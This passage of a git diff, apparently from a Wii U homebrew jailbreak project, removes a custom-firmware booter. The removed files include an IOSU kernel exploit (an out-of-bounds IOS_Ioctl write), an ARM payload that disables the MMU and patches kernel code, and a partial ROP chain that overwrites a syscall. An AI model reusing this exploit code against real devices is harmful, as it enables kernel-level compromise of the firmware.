Clear out our used MEM1 area - memset((void*)0xF5E00000, 0, 0x00070000); - DCStoreRange((void*)0xF5E00000, 0x00070000); - - //!------Variables used in exploit------ - int *pretend_root_hub = (int*)0xF5E60640; - int *ayylmao = (int*)0xF5E00000; - //!------------------------------------- - - ayylmao[5] = 1; - ayylmao[8] = 0x1E00000; - - memcpy((char*)(0xF5E20000), second_chain, sizeof(second_chain)); - memcpy((char*)(0xF5E30000), final_chain, sizeof(final_chain)); - memcpy((char*)(0xF5E40000), arm_kernel_bin, sizeof(arm_kernel_bin)); - memcpy((char*)(0xF5E50000), arm_user_bin, sizeof(arm_user_bin)); - - pretend_root_hub[33] = 0x1E00000; - pretend_root_hub[78] = 0; - - //! Store current CPU cache into main memory for IOSU to read - DCStoreRange(ayylmao, 0x840); - - DCStoreRange((void*)0xF5E20000, sizeof(second_chain)); - DCStoreRange((void*)0xF5E30000, sizeof(final_chain)); - DCStoreRange((void*)0xF5E40000, sizeof(arm_kernel_bin)); - DCStoreRange((void*)0xF5E50000, sizeof(arm_user_bin)); - - DCStoreRange(pretend_root_hub, 0x160); -} - -static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val) -{ - void (*DCStoreRange)(const void *addr, uint32_t length); - void (*OSSleepTicks)(uint64_t ticks); - int (*IOS_Ioctl)(int fd, uint32_t request, void *input_buffer,uint32_t input_buffer_len, void *output_buffer, uint32_t output_buffer_len); - OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange); - OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks); - OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Ioctl", &IOS_Ioctl); - - //!------Variables used in exploit------ - int *ayylmao = (int*)0xF5E00000; - //!------------------------------------- - - ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes - DCStoreRange(ayylmao, 0x840); //! Store current CPU cache into main memory for IOSU to read - OSSleepTicks(0x200000); //! Wait for caches to refresh over in IOSU - //! 
index 0 is at 0x10149A6C, each index is 0x144 bytes long, so 0x10149A6C - (0x144*0xB349B) = 0x1E60640, - //! which is the physical address of 0xF5E60640 for us, right at the end of MEM1 - int request_buffer[] = { -(0xB349B), val }; - int output_buffer[32]; - return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer)); -} diff --git a/dsrom/CBHC/pad.h b/dsrom/cbhc_menu/pad.h similarity index 100% rename from dsrom/CBHC/pad.h rename to dsrom/cbhc_menu/pad.h diff --git a/dsrom/CBHC/types.h b/dsrom/cbhc_menu/types.h similarity index 100% rename from dsrom/CBHC/types.h rename to dsrom/cbhc_menu/types.h diff --git a/dsrom/cfw_booter/Makefile b/dsrom/cfw_booter/Makefile deleted file mode 100644 index 729caca..0000000 --- a/dsrom/cfw_booter/Makefile +++ /dev/null 
@@ -1,44 +0,0 @@ -PATH := $(DEVKITPPC)/bin:$(PATH) -PREFIX ?= powerpc-eabi- -CC = $(PREFIX)gcc -AS = $(PREFIX)gcc -CFLAGS = -std=gnu99 -O3 -nostdinc -fno-builtin -ASFLAGS = -mregnames -x assembler-with-cpp -LD = $(PREFIX)ld -OBJCOPY = $(PREFIX)objcopy -LDFLAGS=-Ttext 180C000 -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/6.2.0 -lgcc -OBJDUMP ?= $(PREFIX)objdump -project := . -root := $(CURDIR) -build := $(root)/bin - -FIRMWARE = 550 - -all: clean setup main - -$(CURDIR)/payload/arm_kernel_bin.h: $(CURDIR)/payload/arm_user_bin.h - @$(MAKE) --no-print-directory -C $(CURDIR)/arm_kernel -f $(CURDIR)/arm_kernel/Makefile - @-mkdir -p $(CURDIR)/payload - @cp -p $(CURDIR)/arm_kernel/arm_kernel_bin.h $@ - -$(CURDIR)/payload/arm_user_bin.h: - @$(MAKE) --no-print-directory -C $(CURDIR)/arm_user -f $(CURDIR)/arm_user/Makefile - @-mkdir -p $(CURDIR)/payload - @cp -p $(CURDIR)/arm_user/arm_user_bin.h $@ - -setup: - mkdir -p $(root)/bin/ - -main: $(CURDIR)/payload/arm_kernel_bin.h - $(CC) $(CFLAGS) -DVER=$(FIRMWARE) -c $(project)/main.c - $(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S - cp -r $(root)/*.o $(build) - rm $(root)/*.o - $(LD) -o cfw_booter.elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map cfw_booter.map - $(OBJCOPY) cfw_booter.elf -S -O binary ../cfw_booter.bin - -clean: - rm -rf $(build) payload - rm -rf cfw_booter.elf cfw_booter.map - $(MAKE) --no-print-directory -C $(CURDIR)/arm_user -f $(CURDIR)/arm_user/Makefile clean - $(MAKE) --no-print-directory -C $(CURDIR)/arm_kernel -f $(CURDIR)/arm_kernel/Makefile clean diff --git a/dsrom/cfw_booter/README b/dsrom/cfw_booter/README deleted file mode 100644 index 2dbcc78..0000000 --- a/dsrom/cfw_booter/README +++ /dev/null @@ -1,2 +0,0 @@ -This is a modified version of cfw booter which can be found here: -https://github.com/dimok789/cfw_booter \ No newline at end of file 
diff --git a/dsrom/cfw_booter/arm_kernel/Makefile b/dsrom/cfw_booter/arm_kernel/Makefile deleted file mode 100644 index 54df575..0000000 --- a/dsrom/cfw_booter/arm_kernel/Makefile +++ /dev/null @@ -1,71 +0,0 @@ -ifeq ($(strip $(DEVKITARM)),) -$(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") -endif - -ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),) -export PATH:=$(DEVKITARM)/bin:$(PATH) -endif - -CC = arm-none-eabi-gcc -# LINK = arm-none-eabi-gcc -LINK = arm-none-eabi-ld -AS = arm-none-eabi-as -OBJCOPY = arm-none-eabi-objcopy -CFLAGS += -Wall -mbig-endian -std=gnu99 -march=armv5 -Os -I$(DEVKITPRO)/libnds/include -LDFLAGS += --script=link.ld -EB -L"$(DEVKITARM)/arm-none-eabi/lib" -Map=output.map - -CFILES = $(wildcard source/*.c) -BINFILES = $(wildcard data/*.bin) -OFILES = $(BINFILES:data/%.bin=build/%.bin.o) -OFILES += $(CFILES:source/%.c=build/%.o) -DFILES = $(CFILES:source/%.c=build/%.d) -SFILES = $(wildcard source/*.s) -OFILES += $(SFILES:source/%.s=build/%.o) -PROJECTNAME = ${shell basename "$(CURDIR)"} -CWD = "$(CURDIR)"" - -#--------------------------------------------------------------------------------- -# canned command sequence for binary data, taken from devkitARM -#--------------------------------------------------------------------------------- -define bin2o - bin2s $< | $(AS) -o $(@) - echo "extern const u8" `(echo $( source/`(echo $(> source/`(echo $(> source/`(echo $( $@ - -$(PROJECTNAME).elf: $(OFILES) - $(LINK) $(LDFLAGS) -o $(PROJECTNAME).elf $(filter-out build/crt0.o, $(OFILES)) - -clean: - @rm -rf build - @rm -f $(PROJECTNAME).elf $(PROJECTNAME).bin $(PROJECTNAME)_bin.h output.map - @echo "all cleaned up !" - --include $(DFILES) - -build/%.o: source/%.c - $(CC) $(CFLAGS) -c $< -o $@ - @$(CC) -MM $< > build/$*.d - -build/%.o: source/%.s - $(CC) $(CFLAGS) -xassembler-with-cpp -c $< -o $@ - @$(CC) -MM $< > build/$*.d - -build/%.bin.o: data/%.bin - @echo $(notdir $<) - @$(bin2o) 
diff --git a/dsrom/cfw_booter/arm_kernel/link.ld b/dsrom/cfw_booter/arm_kernel/link.ld deleted file mode 100644 index c28ba4a..0000000 --- a/dsrom/cfw_booter/arm_kernel/link.ld +++ /dev/null @@ -1,18 +0,0 @@ -OUTPUT_ARCH(arm) - -MEMORY -{ - RAMX (rx) : ORIGIN = 0x08134100, LENGTH = 0x000BF00 -} - -SECTIONS -{ - .text : ALIGN(0x100) { - build/crt0.o(.init) - *(.text) - } - .rodata : { - *(.rodata*) - } -} - diff --git a/dsrom/cfw_booter/arm_kernel/source/crt0.s b/dsrom/cfw_booter/arm_kernel/source/crt0.s deleted file mode 100644 index ae2a3b1..0000000 --- a/dsrom/cfw_booter/arm_kernel/source/crt0.s +++ /dev/null @@ -1,12 +0,0 @@ -.section ".init" -.arm -.align 4 - -.extern _main -.type _main, %function - -.extern memset -.type memset, %function - -_start: - b _main diff --git a/dsrom/cfw_booter/arm_kernel/source/main.c b/dsrom/cfw_booter/arm_kernel/source/main.c deleted file mode 100644 index cfd7b4e..0000000 --- a/dsrom/cfw_booter/arm_kernel/source/main.c +++ /dev/null 
@@ -1,122 +0,0 @@ -#include "types.h" -#include "utils.h" -#include "../../payload/arm_user_bin.h" - -static const char repairData_set_fault_behavior[] = { - 0xE1,0x2F,0xFF,0x1E,0xE9,0x2D,0x40,0x30,0xE5,0x93,0x20,0x00,0xE1,0xA0,0x40,0x00, - 0xE5,0x92,0x30,0x54,0xE1,0xA0,0x50,0x01,0xE3,0x53,0x00,0x01,0x0A,0x00,0x00,0x02, - 0xE1,0x53,0x00,0x00,0xE3,0xE0,0x00,0x00,0x18,0xBD,0x80,0x30,0xE3,0x54,0x00,0x0D, -}; -static const char repairData_set_panic_behavior[] = { - 0x08,0x16,0x6C,0x00,0x00,0x00,0x18,0x0C,0x08,0x14,0x40,0x00,0x00,0x00,0x9D,0x70, - 0x08,0x16,0x84,0x0C,0x00,0x00,0xB4,0x0C,0x00,0x00,0x01,0x01,0x08,0x14,0x40,0x00, - 0x08,0x15,0x00,0x00,0x08,0x17,0x21,0x80,0x08,0x17,0x38,0x00,0x08,0x14,0x30,0xD4, - 0x08,0x14,0x12,0x50,0x08,0x14,0x12,0x94,0xE3,0xA0,0x35,0x36,0xE5,0x93,0x21,0x94, - 0xE3,0xC2,0x2E,0x21,0xE5,0x83,0x21,0x94,0xE5,0x93,0x11,0x94,0xE1,0x2F,0xFF,0x1E, - 0xE5,0x9F,0x30,0x1C,0xE5,0x9F,0xC0,0x1C,0xE5,0x93,0x20,0x00,0xE1,0xA0,0x10,0x00, - 0xE5,0x92,0x30,0x54,0xE5,0x9C,0x00,0x00, -}; -static const char repairData_usb_root_thread[] = { - 0xE5,0x8D,0xE0,0x04,0xE5,0x8D,0xC0,0x08,0xE5,0x8D,0x40,0x0C,0xE5,0x8D,0x60,0x10, - 0xEB,0x00,0xB2,0xFD,0xEA,0xFF,0xFF,0xC9,0x10,0x14,0x03,0xF8,0x10,0x62,0x4D,0xD3, - 0x10,0x14,0x50,0x00,0x10,0x14,0x50,0x20,0x10,0x14,0x00,0x00,0x10,0x14,0x00,0x90, - 0x10,0x14,0x00,0x70,0x10,0x14,0x00,0x98,0x10,0x14,0x00,0x84,0x10,0x14,0x03,0xE8, - 0x10,0x14,0x00,0x3C,0x00,0x00,0x01,0x73,0x00,0x00,0x01,0x76,0xE9,0x2D,0x4F,0xF0, - 0xE2,0x4D,0xDE,0x17,0xEB,0x00,0xB9,0x92,0xE3,0xA0,0x10,0x00,0xE3,0xA0,0x20,0x03, - 0xE5,0x9F,0x0E,0x68,0xEB,0x00,0xB3,0x20, -}; - -/* from smealum's iosuhax: must be placed at 0x05059938 */ -static const char os_launch_hook[] = { - 0x47, 0x78, 0x00, 0x00, 0xe9, 0x2d, 0x40, 0x0f, 0xe2, 0x4d, 0xd0, 0x08, 0xeb, - 0xff, 0xfd, 0xfd, 0xe3, 0xa0, 0x00, 0x00, 0xeb, 0xff, 0xfe, 0x03, 0xe5, 0x9f, - 0x10, 0x4c, 0xe5, 0x9f, 0x20, 0x4c, 0xe3, 0xa0, 0x30, 0x00, 0xe5, 0x8d, 0x30, - 0x00, 0xe5, 0x8d, 0x30, 0x04, 0xeb, 0xff, 0xfe, 
0xf1, 0xe2, 0x8d, 0xd0, 0x08, - 0xe8, 0xbd, 0x80, 0x0f, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, 0x64, 0x63, 0x61, - 0x72, 0x64, 0x30, 0x31, 0x00, 0x2f, 0x76, 0x6f, 0x6c, 0x2f, 0x73, 0x64, 0x63, - 0x61, 0x72, 0x64, 0x00, 0x00, 0x00, 0x2f, 0x76, 0x6f, 0x6c, 0x2f, 0x73, 0x64, - 0x63, 0x61, 0x72, 0x64, 0x00, 0x05, 0x11, 0x60, 0x00, 0x05, 0x0b, 0xe0, 0x00, - 0x05, 0x0b, 0xcf, 0xfc, 0x05, 0x05, 0x99, 0x70, 0x05, 0x05, 0x99, 0x7e, -}; - -static unsigned int __attribute__((noinline)) disable_mmu(void) -{ - unsigned int control_register = 0; - asm volatile("MRC p15, 0, %0, c1, c0, 0" : "=r" (control_register)); - asm volatile("MCR p15, 0, %0, c1, c0, 0" : : "r" (control_register & 0xFFFFEFFA)); - return control_register; -} - -static void __attribute__((noinline)) restore_mmu(unsigned int control_register) -{ - asm volatile("MCR p15, 0, %0, c1, c0, 0" : : "r" (control_register)); -} - -int _main() -{ - int(*disable_interrupts)() = (int(*)())0x0812E778; - int(*enable_interrupts)(int) = (int(*)(int))0x0812E78C; - void(*invalidate_icache)() = (void(*)())0x0812DCF0; - void(*invalidate_dcache)(unsigned int, unsigned int) = (void(*)())0x08120164; - void(*flush_dcache)(unsigned int, unsigned int) = (void(*)())0x08120160; - char* (*kernel_memcpy)(void*, void*, int) = (char*(*)(void*, void*, int))0x08131D04; - - flush_dcache(0x081200F0, 0x4001); // giving a size >= 0x4000 flushes all cache - - int level = disable_interrupts(); - - unsigned int control_register = disable_mmu(); - - /* Save the request handle so we can reply later */ - *(volatile u32*)0x01E10000 = *(volatile u32*)0x1016AD18; - - /* Patch kernel_error_handler to BX LR immediately */ - *(int*)0x08129A24 = 0xE12FFF1E; - - void * pset_fault_behavior = (void*)0x081298BC; - kernel_memcpy(pset_fault_behavior, (void*)repairData_set_fault_behavior, sizeof(repairData_set_fault_behavior)); - - void * pset_panic_behavior = (void*)0x081296E4; - kernel_memcpy(pset_panic_behavior, (void*)repairData_set_panic_behavior, 
sizeof(repairData_set_panic_behavior)); - - void * pusb_root_thread = (void*)0x10100174; - kernel_memcpy(pusb_root_thread, (void*)repairData_usb_root_thread, sizeof(repairData_usb_root_thread)); - - void * pUserBinSource = (void*)0x01E50000; - void * pUserBinDest = (void*)0x101312D0; - kernel_memcpy(pUserBinDest, (void*)pUserBinSource, sizeof(arm_user_bin)); - - int i; - for (i = 0; i < 32; i++) - if (i < 31) - ((char*)(0x050663B4 - 0x05000000 + 0x081C0000))[i] = ((char*)0x01E70000)[i]; - else - ((char*)(0x050663B4 - 0x05000000 + 0x081C0000))[i] = (char)0; - - *(int*)(0x050282AE - 0x05000000 + 0x081C0000) = 0xF031FB43; // bl launch_os_hook - - *(int*)(0x05052C44 - 0x05000000 + 0x081C0000) = 0xE3A00000; // mov r0, #0 - *(int*)(0x05052C48 - 0x05000000 + 0x081C0000) = 0xE12FFF1E; // bx lr - - *(int*)(0x0500A818 - 0x05000000 + 0x081C0000) = 0x20002000; // mov r0, #0; mov r0, #0 - - *(int*)(0x040017E0 - 0x04000000 + 0x08280000) = 0xE3A00000; - *(int*)(0x040019C4 - 0x04000000 + 0x08280000) = 0xE3A00000; - *(int*)(0x04001BB0 - 0x04000000 + 0x08280000) = 0xE3A00000; - *(int*)(0x04001D40 - 0x04000000 + 0x08280000) = 0xE3A00000; - - for (i = 0; i < sizeof(os_launch_hook); i++) - ((char*)(0x05059938 - 0x05000000 + 0x081C0000))[i] = os_launch_hook[i]; - - *(int*)(0x1555500) = 0; - - /* REENABLE MMU */ - restore_mmu(control_register); - - invalidate_dcache(0x081298BC, 0x4001); // giving a size >= 0x4000 invalidates all cache - invalidate_icache(); - - enable_interrupts(level); - - return 0; -} diff --git a/dsrom/cfw_booter/arm_kernel/source/types.h b/dsrom/cfw_booter/arm_kernel/source/types.h deleted file mode 100644 index 5d8eced..0000000 --- a/dsrom/cfw_booter/arm_kernel/source/types.h +++ /dev/null @@ -1,16 +0,0 @@ -#ifndef _TYPES_H -#define _TYPES_H - -#include - -typedef uint8_t u8; -typedef uint16_t u16; -typedef uint32_t u32; -typedef uint64_t u64; - -typedef int8_t s8; -typedef int16_t s16; -typedef int32_t s32; -typedef int64_t s64; - -#endif 
diff --git a/dsrom/cfw_booter/arm_kernel/source/utils.c b/dsrom/cfw_booter/arm_kernel/source/utils.c deleted file mode 100644 index f02ae47..0000000 --- a/dsrom/cfw_booter/arm_kernel/source/utils.c +++ /dev/null @@ -1,25 +0,0 @@ - -void* m_memcpy(void *dst, const void *src, unsigned int len) -{ - const unsigned char *src_ptr = (const unsigned char *)src; - unsigned char *dst_ptr = (unsigned char *)dst; - - while(len) - { - *dst_ptr++ = *src_ptr++; - --len; - } - return dst; -} - -void* m_memset(void *dst, int val, unsigned int bytes) -{ - unsigned char *dst_ptr = (unsigned char *)dst; - unsigned int i = 0; - while(i < bytes) - { - dst_ptr[i] = val; - ++i; - } - return dst; -} diff --git a/dsrom/cfw_booter/arm_kernel/source/utils.h b/dsrom/cfw_booter/arm_kernel/source/utils.h deleted file mode 100644 index fd41db2..0000000 --- a/dsrom/cfw_booter/arm_kernel/source/utils.h +++ /dev/null @@ -1,7 +0,0 @@ -#ifndef _UTILS_H_ -#define _UTILS_H_ - -void* m_memcpy(void *dst, const void *src, unsigned int len); -void* m_memset(void *dst, int val, unsigned int len); - -#endif diff --git a/dsrom/cfw_booter/arm_user/Makefile b/dsrom/cfw_booter/arm_user/Makefile deleted file mode 100644 index 54df575..0000000 --- a/dsrom/cfw_booter/arm_user/Makefile +++ /dev/null 
@@ -1,71 +0,0 @@ -ifeq ($(strip $(DEVKITARM)),) -$(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") -endif - -ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),) -export PATH:=$(DEVKITARM)/bin:$(PATH) -endif - -CC = arm-none-eabi-gcc -# LINK = arm-none-eabi-gcc -LINK = arm-none-eabi-ld -AS = arm-none-eabi-as -OBJCOPY = arm-none-eabi-objcopy -CFLAGS += -Wall -mbig-endian -std=gnu99 -march=armv5 -Os -I$(DEVKITPRO)/libnds/include -LDFLAGS += --script=link.ld -EB -L"$(DEVKITARM)/arm-none-eabi/lib" -Map=output.map - -CFILES = $(wildcard source/*.c) -BINFILES = $(wildcard data/*.bin) -OFILES = $(BINFILES:data/%.bin=build/%.bin.o) -OFILES += $(CFILES:source/%.c=build/%.o) -DFILES = $(CFILES:source/%.c=build/%.d) -SFILES = $(wildcard source/*.s) -OFILES += $(SFILES:source/%.s=build/%.o) -PROJECTNAME = ${shell basename "$(CURDIR)"} -CWD = "$(CURDIR)"" - -#--------------------------------------------------------------------------------- -# canned command sequence for binary data, taken from devkitARM -#--------------------------------------------------------------------------------- -define bin2o - bin2s $< | $(AS) -o $(@) - echo "extern const u8" `(echo $( source/`(echo $(> source/`(echo $(> source/`(echo $( $@ - -$(PROJECTNAME).elf: $(OFILES) - $(LINK) $(LDFLAGS) -o $(PROJECTNAME).elf $(filter-out build/crt0.o, $(OFILES)) - -clean: - @rm -rf build - @rm -f $(PROJECTNAME).elf $(PROJECTNAME).bin $(PROJECTNAME)_bin.h output.map - @echo "all cleaned up !" - --include $(DFILES) - -build/%.o: source/%.c - $(CC) $(CFLAGS) -c $< -o $@ - @$(CC) -MM $< > build/$*.d - -build/%.o: source/%.s - $(CC) $(CFLAGS) -xassembler-with-cpp -c $< -o $@ - @$(CC) -MM $< > build/$*.d - -build/%.bin.o: data/%.bin - @echo $(notdir $<) - @$(bin2o) diff --git a/dsrom/cfw_booter/arm_user/link.ld b/dsrom/cfw_booter/arm_user/link.ld deleted file mode 100644 index 5408355..0000000 --- a/dsrom/cfw_booter/arm_user/link.ld +++ /dev/null 
@@ -1,18 +0,0 @@ -OUTPUT_ARCH(arm) - -MEMORY -{ - RAMX (rx) : ORIGIN = 0x101312D0, LENGTH = 0x000BF00 -} - -SECTIONS -{ - .text : ALIGN(0x04) { - build/crt0.o(.init) - *(.text) - } - .rodata : { - *(.rodata*) - } -} - diff --git a/dsrom/cfw_booter/arm_user/source/crt0.s b/dsrom/cfw_booter/arm_user/source/crt0.s deleted file mode 100644 index b5608cd..0000000 --- a/dsrom/cfw_booter/arm_user/source/crt0.s +++ /dev/null @@ -1,20 +0,0 @@ -.section ".init" -.arm -.align 4 - -.extern _main -.type _main, %function - -.extern memset -.type memset, %function - -_start: - b _main - - .global IOS_DCFlushAllCache -IOS_DCFlushAllCache: - MOV R15, R0 -clean_loop: - MRC p15, 0, r15, c7, c10, 3 - BNE clean_loop - MCR p15, 0, R0, c7, c10, 4 diff --git a/dsrom/cfw_booter/arm_user/source/main.c b/dsrom/cfw_booter/arm_user/source/main.c deleted file mode 100644 index 6f90ca5..0000000 --- a/dsrom/cfw_booter/arm_user/source/main.c +++ /dev/null @@ -1,30 +0,0 @@ -#include "types.h" -#include "utils.h" - - -void _main() -{ - - void(*ios_shutdown)(int) = (void(*)(int))0x1012EE4C; - - int(*reply)(int, int) = (int(*)(int, int))0x1012ED04; - - int saved_handle = *(volatile u32*)0x01E10000; - int myret = reply(saved_handle, 0); - if (myret != 0) - ios_shutdown(1); - - // stack pointer will be 0x1016AE30 - // link register will be 0x1012EACC - asm("LDR SP, newsp\n" - "LDR R0, newr0\n" - "LDR LR, newlr\n" - "LDR PC, newpc\n" - "newsp: .word 0x1016AE30\n" - "newlr: .word 0x1012EACC\n" - "newr0: .word 0x10146080\n" - "newpc: .word 0x10111164\n"); - - - -} diff --git a/dsrom/cfw_booter/arm_user/source/types.h b/dsrom/cfw_booter/arm_user/source/types.h deleted file mode 100644 index 5d8eced..0000000 --- a/dsrom/cfw_booter/arm_user/source/types.h +++ /dev/null 
@@ -1,16 +0,0 @@ -#ifndef _TYPES_H -#define _TYPES_H - -#include - -typedef uint8_t u8; -typedef uint16_t u16; -typedef uint32_t u32; -typedef uint64_t u64; - -typedef int8_t s8; -typedef int16_t s16; -typedef int32_t s32; -typedef int64_t s64; - -#endif diff --git a/dsrom/cfw_booter/arm_user/source/utils.c b/dsrom/cfw_booter/arm_user/source/utils.c deleted file mode 100644 index f02ae47..0000000 --- a/dsrom/cfw_booter/arm_user/source/utils.c +++ /dev/null @@ -1,25 +0,0 @@ - -void* m_memcpy(void *dst, const void *src, unsigned int len) -{ - const unsigned char *src_ptr = (const unsigned char *)src; - unsigned char *dst_ptr = (unsigned char *)dst; - - while(len) - { - *dst_ptr++ = *src_ptr++; - --len; - } - return dst; -} - -void* m_memset(void *dst, int val, unsigned int bytes) -{ - unsigned char *dst_ptr = (unsigned char *)dst; - unsigned int i = 0; - while(i < bytes) - { - dst_ptr[i] = val; - ++i; - } - return dst; -} diff --git a/dsrom/cfw_booter/arm_user/source/utils.h b/dsrom/cfw_booter/arm_user/source/utils.h deleted file mode 100644 index fd41db2..0000000 --- a/dsrom/cfw_booter/arm_user/source/utils.h +++ /dev/null @@ -1,7 +0,0 @@ -#ifndef _UTILS_H_ -#define _UTILS_H_ - -void* m_memcpy(void *dst, const void *src, unsigned int len); -void* m_memset(void *dst, int val, unsigned int len); - -#endif diff --git a/dsrom/cfw_booter/crt0.S b/dsrom/cfw_booter/crt0.S deleted file mode 100644 index d2095cf..0000000 --- a/dsrom/cfw_booter/crt0.S +++ /dev/null @@ -1,7 +0,0 @@ - - .extern __main - .globl _start - -_start: - # jump to our main - b __main diff --git a/dsrom/cfw_booter/main.c b/dsrom/cfw_booter/main.c deleted file mode 100644 index d64a869..0000000 --- a/dsrom/cfw_booter/main.c +++ /dev/null 
@@ -1,387 +0,0 @@ -#include "types.h" -#include "coreinit.h" - -#define CHAIN_START 0x1016AD40 -#define SHUTDOWN 0x1012EE4C -#define SIMPLE_RETURN 0x101014E4 -#define SOURCE 0x01E20000 -#define IOS_CREATETHREAD 0x1012EABC -#define ARM_CODE_BASE 0x08134100 -#define REPLACE_SYSCALL 0x081298BC - -/* YOUR ARM CODE HERE (starts at ARM_CODE_BASE) */ -#include "payload/arm_kernel_bin.h" -#include "payload/arm_user_bin.h" - -/* ROP CHAIN STARTS HERE (0x1015BD78) */ -static const int final_chain[] = { - 0x101236f3, // 0x00 POP {R1-R7,PC} - 0x0, // 0x04 arg - 0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR - 0x68, // 0x0C stacksize - 0x10101638, // 0x10 - 0x0, // 0x14 - 0x0, // 0x18 - 0x0, // 0x1C - 0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} - 0x0, // 0x24 - 0x0, // 0x28 - 0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x30 - 0x0, // 0x34 - IOS_CREATETHREAD, // 0x38 - 0x1, // 0x3C - 0x2, // 0x40 - 0x10123a9f, // 0x44 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE92D4010, // 0x4C value: PUSH {R4,LR} - 0x0, // 0x50 - 0x10123a8b, // 0x54 POP {R3,R4,PC} - 0x1, // 0x58 R3 must be 1 for the arbitrary write - 0x0, // 0x5C - 0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x64 - 0x0, // 0x68 - 0x1012EE64, // 0x6C set_panic_behavior (arbitrary write) - 0x0, // 0x70 - 0x0, // 0x74 - 0x10123a9f, // 0x78 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A04000, // 0x80 value: MOV R4, R0 - 0x0, // 0x84 - 0x10123a8b, // 0x88 POP {R3,R4,PC} - 0x1, // 0x8C R3 must be 1 for the arbitrary write - 0x0, // 0x90 - 0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x98 - 0x0, // 0x9C - 0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write) - 0x0, // 0xA4 - 0x0, // 0xA8 - 0x10123a9f, // 0xAC POP {R0,R1,R4,PC} 
- REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF - 0x0, // 0xB8 - 0x10123a8b, // 0xBC POP {R3,R4,PC} - 0x1, // 0xC0 R3 must be 1 for the arbitrary write - 0x0, // 0xC4 - 0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0xCC - 0x0, // 0xD0 - 0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write) - 0x0, // 0xD8 - 0x0, // 0xDC - 0x10123a9f, // 0xE0 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0) - 0x0, // 0xEC - 0x10123a8b, // 0xF0 POP {R3,R4,PC} - 0x1, // 0xF4 R3 must be 1 for the arbitrary write - 0x0, // 0xF8 - 0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x100 - 0x0, // 0x104 - 0x1012EE64, // 0x108 set_panic_behavior (arbitrary write) - 0x0, // 0x10C - 0x0, // 0x110 - 0x10123a9f, // 0x114 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A00004, // 0x11C value: MOV R0, R4 - 0x0, // 0x120 - 0x10123a8b, // 0x124 POP {R3,R4,PC} - 0x1, // 0x128 R3 must be 1 for the arbitrary write - 0x0, // 0x12C - 0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x134 - 0x0, // 0x138 - 0x1012EE64, // 0x13C set_panic_behavior (arbitrary write) - 0x0, // 0x140 - 0x0, // 0x144 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 
